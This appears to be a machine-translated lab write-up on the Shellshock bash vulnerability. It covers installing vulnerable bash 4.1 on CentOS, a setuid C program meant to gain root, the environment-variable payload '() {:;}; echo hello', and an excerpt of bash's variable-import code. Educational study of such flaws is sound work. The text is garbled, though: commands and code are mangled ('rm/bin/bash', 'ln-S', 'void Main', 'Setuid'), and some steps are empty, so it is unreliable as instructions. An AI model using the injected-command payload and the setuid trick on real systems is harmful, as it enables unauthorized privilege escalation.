Analysis on the utilization process and principle of shellshock loophole

0x00

Today is the day to rest and play lol, but my dedicated roommate has to write a python-like thing. All right, I'm going to study at night to study the vulnerabilities that appeared in the 14 and were protected by their own products---shellshock
This is a vulnerability in Bashshell that could allow an attacker to perform arbitrary code execution on a bash that is less than or equal to version 4.1

Lab Environment: Centos 6.7

Experiment Purpose: Get root permissions

0x01
First check the next own bash version is not less than 4.1
If not, modify it by following the steps below
#wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
#tar XF bash-4.1.tar.gz
#cd bash-4.1
#./configure
#make & make Install
#rm/bin/bash
#ln-S/usr/local/bin/bash/bin/bash
To this can be bash-version down to see if your version has changed, it is recommended to do a mirror first

0x02
Detect a vulnerability
There is a vulnerability in the presence of vulnerable indicating that there is no

And let/bin/sh point to/bin/bash.
$ sudo ln-sf/bin/bash/bin/sh

0x03
Installing GCC
Yum-y Install gcc gcc-c++ kernel-devel
Then write the exploit code
#include <stdio.h>
void Main ()
{
Setuid (Geteuid ());
System ("/bin/ls-l");
}
Save As Xxx.c
To compile
The back lines are wrong, don't mind.

0x04
To attack

Perfect access
0x05
Simple explanation of principle
First, because of the custom function in bash, you only need the function name to call the function.
e.g
$ foo () {echo bar;}
$foo
>bar
Environment variable is
key= Foo
Value= () {echo bar;}
Then we can construct the detection payload.
$export foo= ' () {:;}; Echo Hello '
$bash
>hello
Environment variables
Key=foo
Value= () {:;}; Echo Hello
Obviously, bash reads the environment variables, and when it calls Bash, the custom statements trigger
Remember the setuid in the. c File (Geteuid ());
Makes the make real UID = effective UID.
Let's look at the simplified bash source code.


void Initialize_shell_variables () {//Loop through all environment variables
for (String_index = 0; string = env[string_index++];) {
/*...*/
/* If you have an export function, define it here */
/* Cannot import functions defined in privileged mode (root) */
if (Privmode = = 0 && Read_but_dont_execute = = 0 && streqn ("() {", String, 4)) {
[...]
This is where Shellshock happened.
Transfer function definition + run additional instructions
Parse_and_execute (temp_string, name,
Seval_nonint| Seval_nohist);
[...]
} }
The above-sentence judgment logic leads to the difference between the two, Primode is private mode, requires the real UID and effective UID consistent